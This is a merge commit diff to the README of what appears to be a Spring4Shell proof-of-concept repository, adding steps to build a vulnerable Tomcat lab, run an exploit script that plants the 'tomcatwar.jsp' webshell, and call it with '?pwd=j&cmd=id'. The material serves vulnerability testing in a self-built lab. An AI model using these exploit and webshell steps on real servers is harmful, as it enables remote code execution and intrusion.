Merge pull request #4 from esell/main

Add info on how to test PoC

Author: BobTheShoplifter

README.md

@@ -57,10 +57,14 @@ find . -name spring-beans*.jar
 
 Found intresting poc here : https://github.com/craig/SpringCore0day/blob/main/exp.py & https://twitter.com/vxunderground/status/1509170582469943303
 
-Not been able to test this yet, feel free to create a PR with changes
-
-```python
-python poc.py
-```
+* clone sample repo from https://spring.io/guides/gs/handling-form-submission/
+* you can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial
+* modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy). build war file :)
+* install tomcat9 + java 11 (i did it on ubuntu 20.04 via apt-get)
+* deploy the war file
+* update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
+* run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url http://your.ip.here:8080/handling-form-submission-complete/greeting
+* you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission
+* hit http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id to see the results
 
 WIP :=)